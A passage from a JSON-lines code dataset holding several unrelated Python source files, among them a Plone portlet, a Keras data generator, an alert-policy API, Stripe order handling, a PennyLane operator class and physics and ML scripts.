name=u'plone_context_state')\n HAS_PLONE4 = False\n try:\n actions = context_state.actions(actions_category)\n HAS_PLONE4 = True\n except TypeError: # Plone < 4\n actions = context_state.actions()\n\n # Finding method for icons\n# if show_icons:\n# portal_actionicons = getToolByName(self.context, 'portal_actionicons')\n# def render_icon(category, action, default):\n# if action.has_key('icon') and action['icon']:\n# # We have an icon *in* this action\n# return action['icon']\n# # Otherwise we look for an icon in portal_actionicons\n# if category != 'object_buttons':\n# return portal_actionicons.renderActionIcon(category, action['id'], default)\n# else:\n# # object_buttons\n# plone_utils = getToolByName(self.context, 'plone_utils')\n# return plone_utils.getIconFor(category, action['id'], default)\n# else:\n def render_icon(category, action_id, default):\n # We don't show icons whatever\n return None\n\n # Building the result as list of dicts\n result = []\n\n if actions_category == \"portal_tabs\":\n # Special case for portal_tabs (we rely on content in Plone root)\n portal_tabs_view = getMultiAdapter(\n (self.context, self.context.REQUEST), name='portal_tabs_view')\n actions = portal_tabs_view.topLevelTabs(actions=actions)\n for action in actions:\n link = {\n 'id':action['id'],\n 'url': action['url'],\n 'title': action['name'],\n 'icon': render_icon(\n actions_category,\n action,\n default=default_icon)\n }\n result.append(link)\n\n else:\n if actions_category == 'object_buttons':\n actions_tool = getMultiAdapter((aq_inner(self.context), self.context.request), name=u'plone_tools').actions()\n actions = actions_tool.listActionInfos(object=aq_inner(self.context), categories=(actions_category,))\n elif not HAS_PLONE4:\n actions = actions.get(actions_category, [])\n for action in actions:\n if not (action['available']\n and action['visible']\n and action['allowed']\n and action['url']):\n continue\n link = {\n 'id': action['id'],\n 'url': action['url'],\n 'title': action['title'],\n 'icon': render_icon(\n actions_category,\n action,\n default=default_icon),\n 'modal': action.get('modal'),\n }\n result.append(link)\n return result\n\n\nclass AddForm(base.AddForm):\n \"\"\"Portlet add form.\n This is registered in configure.zcml. The schema attribute tells\n plone.autoform which fields to display. The create() method actually\n constructs the assignment that is being added.\n \"\"\"\n schema = IActionsPortlet\n label = _(u'heading_add_actions_portlet',\n default=u'Add actions portlet')\n description = _(u'help_add_actions_portlet',\n default=u'An action portlet displays actions from a category')\n\n def create(self, data):\n return Assignment(**data)\n\n\nclass EditForm(base.EditForm):\n \"\"\"Portlet edit form.\n\n This is registered with configure.zcml. The schema attribute tells\n plone.autoform which fields to display.\n \"\"\"\n schema = IActionsPortlet\n","sub_path":"buildout-cache/eggs/plone.app.portlets-3.0.5-py2.7.egg/plone/app/portlets/portlets/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":7533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"1658529","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 4 20:44:11 2014\n\n@author: ericguichet\n\"\"\"\n\n# importation des modules\n\nfrom scipy.integrate import odeint\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# declaration des fonctions\n\ndef F(X,t):\n vm=1.5\n vc=8.0\n vecteur_CM=np.array([vm*t-X[0],-X[1]])\n return vc*vecteur_CM/np.linalg.norm(vecteur_CM)\n\n# programme principal\n\nX0=np.array([100,300])\nt=np.linspace(0,38,100)\nX=odeint(F,X0,t)\nplt.axis([0,100,0,300])\nplt.plot(X[:,0],X[:,1])\nplt.savefig('trajectoire_du_chien.png')\nplt.show()\n","sub_path":"Exercices/31_equadiffs/maitre_chien/syst_diff_chien_maitre.py","file_name":"syst_diff_chien_maitre.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"108884799","text":"import keras\nimport numpy as np\nimport pandas as pd\n\nMAX_UID = 73421\nMAX_JID = 100\nUCATS = ['u' + str(i+1) for i in range(MAX_UID)]\nJCATS = ['j' + str(i+1) for i in range(MAX_JID)]\n\nnp.random.seed(9999)\n\n# Original code by Afshine Amidi & Shervine Amidi from\n# https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly\nclass DataGenerator(keras.utils.Sequence):\n 'Generate data batch by batch for 73,421 categorical input NN'\n def __init__(self, train, batch_size=4096, shuffle=True):\n 'Initialization'\n self.train = train\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.indexes = None\n self.on_epoch_end()\n\n def __len__(self):\n 'Denotes the number of batches per epoch'\n return int(np.floor(self.train.shape[0] / self.batch_size))\n\n def __getitem__(self, index):\n 'Generate one batch of data'\n # get the batch DF subset; index = 0, 1, 2, ...\n indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]\n df = self.train.iloc[indexes, :]\n\n # Dummify user and joke IDs for this DF subset\n # u_dummies = pd.get_dummies(df['uID'], prefix='u', prefix_sep='')\n # j_dummies = pd.get_dummies(df['jID'], prefix='j', prefix_sep='')\n # u_dummies = u_dummies.reindex(columns=UCATS, fill_value=0)\n # j_dummies = j_dummies.reindex(columns=JCATS, fill_value=0)\n #\n # X = pd.concat([u_dummies, j_dummies], 1).values\n # y = df.iloc[:,2].values\n\n X = [df.uID, df.jID]\n y = df.iloc[:, 2]\n\n return X, y\n\n def on_epoch_end(self):\n 'Updates indexes after each epoch'\n self.indexes = np.arange(self.train.shape[0])\n if self.shuffle == True:\n np.random.shuffle(self.indexes)\n\n","sub_path":"mlp/DataGenerator.py","file_name":"DataGenerator.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"531039953","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"\nAlert element types that can be used as a matching criteria in the rules of an Alert Policy.\n\"\"\"\nfrom smc.api.exceptions import AlertChainError, UnsupportedAlertChannel, AlertPolicyError\nfrom smc.base.model import Element, ElementCreator, SubElement\nfrom smc.base.util import element_resolver\n\n\nclass AlertElement(Element):\n \"\"\"\n Base alert element.\n \"\"\"\n\n\nclass CustomAlert(AlertElement):\n \"\"\"\n This represents a custom Alert.\n It gives the name and description to an Alert Event. The Alert element can be used\n as a matching criteria in the rules of an Alert Policy.\n\n Create an alert::\n\n CustomAlert.create('myalert')\n \"\"\"\n\n typeof = \"alert\"\n\n @classmethod\n def create(cls, name, comment=None):\n \"\"\"\n Create the custom alert\n\n :param str name: name of custom alert\n :param str comment: optional comment\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta\n :rtype: CustomAlert\n \"\"\"\n json = {\"name\": name, \"comment\": comment}\n\n return ElementCreator(cls, json)\n\n\nclass FwAlert(AlertElement):\n \"\"\"\n This represents a predefined Firewall Alert.\n It gives the name and description to an Alert Event. The Alert element can be used\n as a matching criteria in the rules of an Alert Policy.\n \"\"\"\n\n typeof = \"fw_alert\"\n\n\nclass IdsAlert(AlertElement):\n \"\"\"\n This represents a predefined IDS Alert.\n It gives the name and description to an Alert Event. The Alert element can be used\n as a matching criteria in the rules of an Alert Policy.\n \"\"\"\n\n typeof = \"ids_alert\"\n\n\nclass AlertChain(Element):\n \"\"\"\n This represents an Alert Chain.\n \"\"\"\n typeof = \"alert_chain\"\n\n @classmethod\n def create(cls, name, final_action=None, alert_chain_ref=None, comment=None):\n \"\"\"\n Create the custom alert\n :param str name: name of alert chain\n :param str comment: optional comment\n :param str final_action: optional final_action\n possible values:\n 1)none: stop policy processing without acknowledging.\n 2)acknowledge: stop policy processing and acknowledge.\n 3)redirect: redirect to another alert chain.\n 4)return: return to the next policy rule.\n :param obj alert_chain_ref: The redirect alert chain. object of AlertChain.\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta of alert chain\n :rtype: AlertChain\n \"\"\"\n json = {\"name\": name, \"final_action\": final_action, \"comment\": comment}\n if final_action == 'redirect':\n json.update(alert_chain_ref=alert_chain_ref)\n\n return ElementCreator(cls, json)\n\n @property\n def final_action(self):\n return self.data.get(\"final_action\", None)\n\n @property\n def open(self):\n self.make_request(href=self.get_relation(\"open\"), method=\"create\")\n\n @property\n def save(self):\n self.make_request(href=self.get_relation(\"save\"), method=\"create\")\n\n @property\n def alert_chain_rules(self):\n return [AlertChainRule(**rule) for rule in self.make_request(resource=\"alert_chain_rules\")]\n\n def add_alert_chain_rule(self, name, alert_channel=None, destination=None, delay=0,\n admin_name=[], amount=None, notify_first_block=0, period=0,\n comment=None):\n AlertChainRule.create(self, name, alert_channel, destination, delay, admin_name,\n amount, notify_first_block, period, comment)\n\n\nclass AlertChainRule(SubElement):\n \"\"\"\n This represents a Alert Chain Rule for Alert Chain Policy.\n \"\"\"\n typeof = \"alert_chain_rule\"\n\n @staticmethod\n def create(self, name, alert_channel=None, destination=None, delay=0, admin_name=[],\n amount=None, notify_first_block=0, period=0, comment=None):\n \"\"\"\n :param object self: object of AlertChain.\n :param str name: name of alert chain rule.\n :param str alert_channel: The alert channel, default is Delay channel.Valid values are below\n smtp: SMTP channel.\n sms: SMS channel.\n snmp: SNMP channel.\n custom_script: Custom script channel.\n delay: Delay channel.\n user_notification: User notification channel.\n :param str destination: destination address\n :param int delay: The delay before the next notification, in minutes.\n :param list admin_name: List of admin users. Used in the case of User notification channel.\n :param int amount: The maximum number of notifications to be sent before activating\n moderation.\n :param int notify_first_block: Indicates whether we shall notify the first blocked\n notification upon moderation activation.\n :param int period: The period during which notifications are tracked before activating\n moderation. period need to be mentioned in minutes.\n :param str comment: descript of element.\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta of alert chain rule\n :rtype: AlertChainRule\n \"\"\"\n if alert_channel not in ['smtp', 'sms', 'snmp', 'custom_script', 'user_notification',\n 'delay'] and alert_channel:\n raise UnsupportedAlertChannel(\n \"Failed to create an alert chain rule due to an unsupported alert channel {}\".\n format(alert_channel))\n json = {\n \"name\": name,\n \"alert_channel\": alert_channel,\n \"delay\": delay,\n \"period\": period,\n \"notify_first_block\": notify_first_block,\n \"admin_name\": admin_name,\n \"comment\": comment\n }\n if amount:\n json.update(amount=amount)\n if destination:\n json.update(destination=destination)\n return ElementCreator(\n AlertChainRule,\n exception=AlertChainError,\n href=self.get_relation(\"alert_chain_rules\"),\n json=json,\n )\n\n\nclass AlertPolicy(Element):\n \"\"\"\n This represents an Alert Policy.\n \"\"\"\n typeof = \"alert_policy\"\n\n @classmethod\n def create(cls, name, comment=None):\n \"\"\"\n Create the custom alert\n :param str name: name of alert policy\n :param str comment: optional comment\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta of alert policy\n :rtype: AlertPolicy\n \"\"\"\n json = {\"name\": name, \"comment\": comment}\n return ElementCreator(cls, json)\n\n @property\n def alert_rules(self):\n return [AlertRule(**rule) for rule in self.make_request(resource=\"alert_rules\")]\n\n def add_alert_rule(self, name, alert_chain_ref=None, match_sender_ref=[],\n alert_and_situation_ref=[], min_severity=1, max_severity=10,\n rule_validity_times=[], comment=None):\n \"\"\"\n creation of the element of type alert_rule.\n :param object self: object of AlertPolicy.\n :param str name: name of alert rule.\n :param str(AlertChain) alert_chain_ref: The Alert Chain.\n :param str match_sender_ref: The senders. If empty, it is considered as ANY.\n :param list alert_and_situation_ref: The alerts and situations. If empty, it is considered\n as ANY.\n :param int min_severity: The minimum value for the severity (value between 1 and 10)\n :param int max_severity: The maximum value for the severity (value between 1 and 10)\n :param list rule_validity_times: The rule's validity to a specific time period. During the\n specified time period, the rule matches. Outside the specified time period, the rule\n does not match and the matching continues to the next rule.\n :param str comment: descript of element.\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta of alert rule\n :rtype: AlertRule\n \"\"\"\n return AlertRule.create(self, name, alert_chain_ref, match_sender_ref,\n alert_and_situation_ref,\n min_severity, max_severity, rule_validity_times, comment)\n\n\nclass AlertRule(SubElement):\n \"\"\"\n This represents Alert Rule for Alert Policy.\n \"\"\"\n typeof = \"alert_rule\"\n\n @staticmethod\n def create(self, name, alert_chain_ref=None, match_sender_ref=[], alert_and_situation_ref=[],\n min_severity=1, max_severity=10, rule_validity_times=[], comment=None):\n \"\"\"\n creation of the element of type alert_rule.\n :param object self: object of AlertPolicy.\n :param str name: name of alert rule.\n :param str(AlertChain) alert_chain_ref: The Alert Chain.\n :param str match_sender_ref: The senders. If empty, it is considered as ANY.\n :param list alert_and_situation_ref: The alerts and situations. If empty, it is considered\n as ANY.\n :param int min_severity: The minimum value for the severity (value between 1 and 10):Matches\n the rule to only Situations with the specified Severity value(s). For example, if your\n rule is general and matches a wide range of Situations, you may want to create two\n similar rules: one for less severe Situations and one for more Severe situations. Useful\n in rules that contain Tags in the Situation cell.\n :param int max_severity: The maximum value for the severity (value between 1 and 10):Matches\n the rule to only Situations with the specified Severity value(s). For example if your\n rule is general and matches a wide range of Situations, you may want to create two\n similar rules: one for less severe Situations and one for more Severe situations. Useful\n in rules that contain Tags in the Situation cell.\n :param list rule_validity_times: The rule's validity to a specific time period. During the\n specified time period, the rule matches. Outside the specified time period, the rule\n does not match and the matching continues to the next rule.\n :param str comment: descript of element.\n :raises CreateElementFailed: failed creating element with reason\n :return: instance with meta of alert rule\n :rtype: AlertRule\n \"\"\"\n params = {}\n json = {\n \"name\": name,\n \"match_sender_ref\": element_resolver(match_sender_ref),\n \"alert_and_situation_ref\": element_resolver(alert_and_situation_ref),\n \"rule_validity_times\": element_resolver(rule_validity_times),\n \"min_severity\": min_severity,\n \"max_severity\": max_severity,\n \"comment\": comment\n }\n if alert_chain_ref:\n json.update(alert_chain_ref=element_resolver(alert_chain_ref))\n return ElementCreator(\n AlertRule,\n exception=AlertPolicyError,\n href=self.get_relation(\"alert_rules\"),\n params=params,\n json=json,\n )\n","sub_path":"smc/elements/alerts.py","file_name":"alerts.py","file_ext":"py","file_size_in_byte":11879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"443385210","text":"from django_slack import slack_message\nimport stripe\n\nfrom django.db import transaction\n\nfrom ironcage.stripe_integration import create_charge_for_order\n\nfrom .mailer import send_order_confirmation_mail\nfrom .models import Order\n\nimport structlog\nlogger = structlog.get_logger()\n\n\ndef create_pending_order(purchaser, adult_name, adult_email_addr, adult_phone_number, accessibility_reqs, dietary_reqs, unconfirmed_details):\n logger.info('children.actions.create_pending_order', purchaser=purchaser.id)\n with transaction.atomic():\n return Order.objects.create_pending(\n purchaser=purchaser,\n adult_name=adult_name,\n adult_phone_number=adult_phone_number,\n adult_email_addr=adult_email_addr,\n accessibility_reqs=accessibility_reqs,\n dietary_reqs=dietary_reqs,\n unconfirmed_details=unconfirmed_details,\n )\n\n\ndef update_pending_order(order, adult_name, adult_email_addr, adult_phone_number, accessibility_reqs, dietary_reqs, unconfirmed_details):\n logger.info('children:update_pending_order', order=order.order_id)\n with transaction.atomic():\n order.update(adult_name, adult_email_addr, adult_phone_number, accessibility_reqs, dietary_reqs, unconfirmed_details)\n\n\ndef process_stripe_charge(order, token):\n logger.info('children:process_stripe_charge', order=order.order_id, token=token)\n assert order.payment_required()\n try:\n charge = create_charge_for_order(order, token)\n confirm_order(order, charge.id, charge.created)\n except stripe.error.CardError as e:\n mark_order_as_failed(order, e._message)\n\n\ndef confirm_order(order, charge_id, charge_created):\n logger.info('children:confirm_order', order=order.order_id, charge_id=charge_id)\n with transaction.atomic():\n order.confirm(charge_id, charge_created)\n send_receipt(order)\n slack_message('children/order_created.slack', {'order': order})\n\n\ndef mark_order_as_failed(order, charge_failure_reason):\n logger.info('children:mark_order_as_failed', order=order.order_id, charge_failure_reason=charge_failure_reason)\n with transaction.atomic():\n order.mark_as_failed(charge_failure_reason)\n\n\ndef send_receipt(order):\n logger.info('children:children:send_receipt', order=order.order_id)\n send_order_confirmation_mail(order)\n","sub_path":"children/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"466595208","text":"import warnings\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.tree import DecisionTreeClassifier \nfrom sklearn.metrics import accuracy_score \nfrom sklearn.metrics import classification_report \nfrom sklearn.preprocessing import LabelEncoder\n \n#warnings.filterwarnings('ignore')\ndf_ = pd.read_csv('ProjectUpdate2-Dataset.csv')\n\ntype_df = df_.filter(items = ['REPO_TYPE','SECU_FLAG'])\nspace_df = df_.filter(items = ['ADD_LOC', 'DEL_LOC', 'TOT_LOC', 'SECU_FLAG'])\ntime_df = df_.filter(items = ['PRIOR_AGE', 'SECU_FLAG'])\n\n#Space-based\nx = df_.filter(items = ['ADD_LOC', 'DEL_LOC', 'TOT_LOC'])\ny = df_.filter(items = ['SECU_FLAG'])\n \nx_train, x_test, y_train, y_test = train_test_split(x, y)\n\n#Training\ntrained_gini = DecisionTreeClassifier(criterion = \"gini\")\ntrained_gini.fit(x_train, y_train)\ntrained_entropy = DecisionTreeClassifier(criterion = \"entropy\")\ntrained_entropy.fit(x_train, y_train)\n\n#Results\nprint(\"Results Using Gini Index:\") \ny_pred_gini = trained_gini.predict(x_test) \n\nprint(\"Accuracy:\")\nprint(accuracy_score(y_test,y_pred_gini)*100) \n \nprint(\"Report :\") \nprint(classification_report(y_test, y_pred_gini)) \n \nprint(\"Results Using Entropy:\") \ny_pred_entropy = trained_entropy.predict(x_test) \n\nprint(\"Accuracy:\")\nprint(accuracy_score(y_test,y_pred_entropy)*100) \n \nprint(\"Report :\") \nprint(classification_report(y_test, y_pred_entropy))","sub_path":"Project Update #2/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"309212217","text":"from db import db\n\n\nclass MedicalObservationModel(db.Model):\n __tablename__ = 'medical_observations'\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n title = db.Column(db.String(255), nullable=False)\n description = db.Column(db.Text, nullable=False)\n health_state = db.Column(db.Text, nullable=False)\n\n patient_id = db.Column(db.Integer, db.ForeignKey('patients.id'))\n patient = db.relationship('PatientModel', uselist=False)\n\n doctor_id = db.Column(db.Integer, db.ForeignKey('doctors.id'))\n doctor = db.relationship('DoctorModel', uselist=False)\n\n medical_service_id = db.Column(db.Integer, db.ForeignKey('medical_services.id'))\n medical_service = db.relationship('DoctorModel', uselist=False)\n\n def __init__(self, title, description, health_state, patient_id: int, doctor_id: int, medical_service_id: int) -> None:\n self.title = title\n self.description = description\n self.health_state = health_state\n self.patient_id = patient_id\n self.doctor_id = doctor_id\n\n def json(self):\n return {\n 'title': self.title,\n 'description': self.description,\n 'health_state': self.health_state,\n 'patient_id': self.patient_id,\n 'doctor_id': self.doctor_id,\n }\n\n def save_to_db(self):\n db.session.add(self)\n db.session.commit()\n","sub_path":"models/medical_observation.py","file_name":"medical_observation.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"99684343","text":"# Copyright 2018-2022 Xanadu Quantum Technologies Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nThis submodule defines the symbolic operation that stands for the power of an operator.\n\"\"\"\nimport copy\nfrom typing import Union\n\nfrom scipy.linalg import fractional_matrix_power\n\nimport pennylane as qml\nfrom pennylane import math as qmlmath\nfrom pennylane.operation import (\n DecompositionUndefinedError,\n Observable,\n Operation,\n PowUndefinedError,\n SparseMatrixUndefinedError,\n expand_matrix,\n)\nfrom pennylane.ops.identity import Identity\nfrom pennylane.queuing import QueuingContext, apply\nfrom pennylane.wires import Wires\n\nfrom .symbolicop import SymbolicOp\n\n_superscript = str.maketrans(\"0123456789.+-\", \"⁰¹²³⁴⁵⁶⁷⁸⁹⋅⁺⁻\")\n\n\n# pylint: disable=no-member\nclass PowOperation(Operation):\n \"\"\"Operation-specific methods and properties for the ``Pow`` class.\n\n Dynamically mixed in based on the provided base operator. If the base operator is an\n Operation, this class will be mixed in.\n\n When we no longer rely on certain functionality through `Operation`, we can get rid of this\n class.\n \"\"\"\n\n # until we add gradient support\n grad_method = None\n\n def inv(self):\n self.hyperparameters[\"z\"] *= -1\n self._name = f\"{self.base.name}**{self.z}\"\n return self\n\n @property\n def inverse(self):\n return False\n\n @inverse.setter\n def inverse(self, boolean):\n if boolean is True:\n raise NotImplementedError(\"The inverse can not be set for a power operator\")\n\n @property\n def base_name(self):\n return self._name\n\n @property\n def name(self):\n return self._name\n\n # pylint: disable=missing-function-docstring\n @property\n def basis(self):\n return self.base.basis\n\n @property\n def control_wires(self):\n return self.base.control_wires\n\n\nclass Pow(SymbolicOp):\n \"\"\"Symbolic operator denoting an operator raised to a power.\n\n Args:\n base (~.operation.Operator): the operator to be raised to a power\n z=1 (float): the exponent\n\n **Example**\n\n >>> sqrt_x = Pow(qml.PauliX(0), 0.5)\n >>> sqrt_x.decomposition()\n [SX(wires=[0])]\n >>> qml.matrix(sqrt_x)\n array([[0.5+0.5j, 0.5-0.5j],\n [0.5-0.5j, 0.5+0.5j]])\n >>> qml.matrix(qml.SX(0))\n array([[0.5+0.5j, 0.5-0.5j],\n [0.5-0.5j, 0.5+0.5j]])\n >>> qml.matrix(Pow(qml.T(0), 1.234))\n array([[1. +0.j , 0. +0.j ],\n [0. +0.j , 0.56597465+0.82442265j]])\n\n \"\"\"\n\n _operation_type = None # type if base inherits from operation and not observable\n _operation_observable_type = None # type if base inherits from both operation and observable\n _observable_type = None # type if base inherits from observable and not oepration\n\n # pylint: disable=unused-argument\n def __new__(cls, base=None, z=1, do_queue=True, id=None):\n \"\"\"Mixes in parents based on inheritance structure of base.\n\n Though all the types will be named \"Pow\", their *identity* and location in memory will be\n different based on ``base``'s inheritance. We cache the different types in private class\n variables so that:\n\n \"\"\"\n\n if isinstance(base, Operation):\n if isinstance(base, Observable):\n if cls._operation_observable_type is None:\n base_classes = (PowOperation, Pow, SymbolicOp, Observable, Operation)\n cls._operation_observable_type = type(\"Pow\", base_classes, dict(cls.__dict__))\n return object.__new__(cls._operation_observable_type)\n\n # not an observable\n if cls._operation_type is None:\n base_classes = (PowOperation, Pow, SymbolicOp, Operation)\n cls._operation_type = type(\"Pow\", base_classes, dict(cls.__dict__))\n return object.__new__(cls._operation_type)\n\n if isinstance(base, Observable):\n if cls._observable_type is None:\n base_classes = (Pow, SymbolicOp, Observable)\n cls._observable_type = type(\"Pow\", base_classes, dict(cls.__dict__))\n return object.__new__(cls._observable_type)\n\n return object.__new__(Pow)\n\n def __init__(self, base=None, z=1, do_queue=True, id=None):\n\n # incorporate base inverse attribute into the exponent\n if getattr(base, \"inverse\", False):\n base.inverse = False\n z *= -1\n\n self.hyperparameters[\"z\"] = z\n self._name = f\"{base.name}**{z}\"\n\n super().__init__(base, do_queue=do_queue, id=id)\n\n @property\n def z(self):\n \"\"\"The exponent.\"\"\"\n return self.hyperparameters[\"z\"]\n\n @property\n def batch_size(self):\n return self.base.batch_size\n\n @property\n def ndim_params(self):\n return self.base.ndim_params\n\n def label(self, decimals=None, base_label=None, cache=None):\n z_string = format(self.z).translate(_superscript)\n return self.base.label(decimals, base_label, cache=cache) + z_string\n\n def matrix(self, wire_order=None):\n base_matrix = self.base.matrix()\n\n if isinstance(self.z, int):\n mat = qmlmath.linalg.matrix_power(base_matrix, self.z)\n else:\n mat = fractional_matrix_power(base_matrix, self.z)\n\n if wire_order is None or self.wires == Wires(wire_order):\n return mat\n\n return expand_matrix(mat, wires=self.wires, wire_order=wire_order)\n\n # pylint: disable=arguments-differ\n @staticmethod\n def compute_sparse_matrix(*params, base=None, z=0):\n if isinstance(z, int):\n base_matrix = base.compute_sparse_matrix(*params, **base.hyperparameters)\n return base_matrix**z\n raise SparseMatrixUndefinedError\n\n def decomposition(self):\n try:\n return self.base.pow(self.z)\n except PowUndefinedError as e:\n if isinstance(self.z, int) and self.z > 0:\n if QueuingContext.recording():\n return [apply(self.base) for _ in range(self.z)]\n return [copy.copy(self.base) for _ in range(self.z)]\n # TODO: consider: what if z is an int and less than 0?\n # do we want Pow(base, -1) to be a \"more fundamental\" op\n raise DecompositionUndefinedError from e\n\n def diagonalizing_gates(self):\n r\"\"\"Sequence of gates that diagonalize the operator in the computational basis.\n\n Given the eigendecomposition :math:`O = U \\Sigma U^{\\dagger}` where\n :math:`\\Sigma` is a diagonal matrix containing the eigenvalues,\n the sequence of diagonalizing gates implements the unitary :math:`U`.\n\n The diagonalizing gates of an operator to a power is the same as the diagonalizing\n gates as the original operator. As we can see,\n\n .. math::\n\n O^2 = U \\Sigma U^{\\dagger} U \\Sigma U^{\\dagger} = U \\Sigma^2 U^{\\dagger}\n\n This formula can be extended to inversion and any rational number.\n\n The diagonalizing gates rotate the state into the eigenbasis\n of the operator.\n\n A ``DiagGatesUndefinedError`` is raised if no representation by decomposition is defined.\n\n .. seealso:: :meth:`~.Operator.compute_diagonalizing_gates`.\n\n Returns:\n list[.Operator] or None: a list of operators\n \"\"\"\n return self.base.diagonalizing_gates()\n\n def eigvals(self):\n base_eigvals = self.base.eigvals()\n return [value**self.z for value in base_eigvals]\n\n def generator(self):\n r\"\"\"Generator of an operator that is in single-parameter-form.\n\n The generator of a power operator is ``z`` times the generator of the\n base matrix.\n\n .. math::\n\n U(\\phi)^z = e^{i\\phi (z G)}\n\n See also :func:`~.generator`\n \"\"\"\n return self.z * self.base.generator()\n\n def simplify(self) -> Union[\"Pow\", Identity]:\n try:\n ops = self.base.pow(z=self.z)\n if not ops:\n return (\n qml.prod(*(qml.Identity(w) for w in self.wires))\n if len(self.wires) > 1\n else qml.Identity(self.wires[0])\n )\n op = qml.prod(*ops) if len(ops) > 1 else ops[0]\n return op.simplify()\n except PowUndefinedError:\n return Pow(base=self.base.simplify(), z=self.z)\n","sub_path":"pennylane/ops/op_math/pow_class.py","file_name":"pow_class.py","file_ext":"py","file_size_in_byte":8965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"464062298","text":"#! /usr/bin/env python3\n\n# Box with superposition of several stationary states, ground state and some excited states\n\nimport numpy as np\nfrom matplotlib.pyplot import figure,axes,plot,title,xlabel,ylabel,show\nfrom matplotlib.animation import FuncAnimation\n\ndef animate_curve_2d(x_lim,y_lim,x_data,y_data,N,plt_cmd,titl,x_label,y_label,xpos):\n fig=figure()\n akse=axes(xlim=x_lim,ylim=y_lim)\n title(titl)\n xlabel(x_label)\n ylabel(y_label)\n line, =plot([],[],plt_cmd)\n pos, =plot([],[],'ro')\n def init():\n line.set_data([],[])\n pos.set_data([],[])\n return line,pos\n def anim(i,x_data,y_data):\n line.set_data(x_data,y_data[i,:])\n pos.set_data(xpos[i],0.1)\n return line,pos\n ani=FuncAnimation(fig,anim,init_func=init,frames=N,fargs=(x_data,y_data),interval=50,blit=True,repeat=False)\n show()\n\n# Function to animate superposotion of several states(with quantum numbers spread dn about n) in a box.\ndef animate_wavepacket(n,dn):\n x0=0.0\n x1=1.0\n NX=500\n x=np.arange(NX+1)*(x1-x0)/NX # Table with x-values\n n1=n-dn # Lowest quantum number\n n2=n+dn # Highest quantum number\n N=2*dn+2\n\n nq=np.arange(n1,n2+1) # Quantum numbers for states\n psi=np.empty((n2-n1,NX+1))\n wq=np.ones(n2-n1)*(0+0j) # Complex zeros\n a=np.empty(n2-n1)\n om=np.zeros(n2-n1)\n fi=-np.pi/2\n for i in range(n2-n1):\n wq[i]=(np.cos((nq[i]-n)*np.pi/N))**2*np.exp(1j*(nq[i]-n)*fi)\n om[i]=nq[i]**2 # Frequency of state i\n a=wq/np.sqrt(np.sum(np.abs(wq)**2)) # Table with expansion coefficents\n\n # Weighted eigenfunction:\n wpsi=np.ones((n2-n1,NX+1))*(0+0j)\n for i in range(n2-n1):\n wpsi[i]=np.sqrt(2/x1)*np.sin(nq[i]*np.pi*x/x1)*a[i]\n\n t0=0\n T=0.01\n NT=200\n t=np.arange(NT+1)*(T-t0)/NT # Time table \n\n Psi=np.ones(NX+1)*(0+0j) # Table of compex zeros\n Psisq=np.zeros((NT+1,NX+1))\n expectationvalue=np.zeros(NT+1)\n\n for nt in range(NT+1):\n Psi*=0+0j\n for i in range(n2-n1):\n exp=np.exp(-1j*om[i]*t[nt]) # Time-exponential for state i\n Psi+=wpsi[i]*exp\n Psisq[nt,:]=abs(Psi)**2\n s=0\n for i in range(1,NX):\n s+=x[i]*Psisq[nt,i] # Integration by trapezoidal rule\n expectationvalue[nt]=s*(x1-x0)/NX\n\n animate_curve_2d((x0,x1),(0,np.max(Psisq)),x,Psisq,NT,'','$\\Psi(x,t)$: Superposition, $\\langle x\\\\rangle$ in red','$x$','$|\\Psi(x,t)|^2$',expectationvalue)\n\nif __name__=='__main__':\n n=208 # Central quantum number\n dn=10 # Spread in quantum nubers\n animate_wavepacket(n,dn)\n\n","sub_path":"s4/kvante-TFY4215/python_prog/box_non_stationary_3.py","file_name":"box_non_stationary_3.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"7906096","text":"def seq(n):\n i = list(map(int, n))\n lim = len(i)\n d = i[0]-i[1]\n for l in 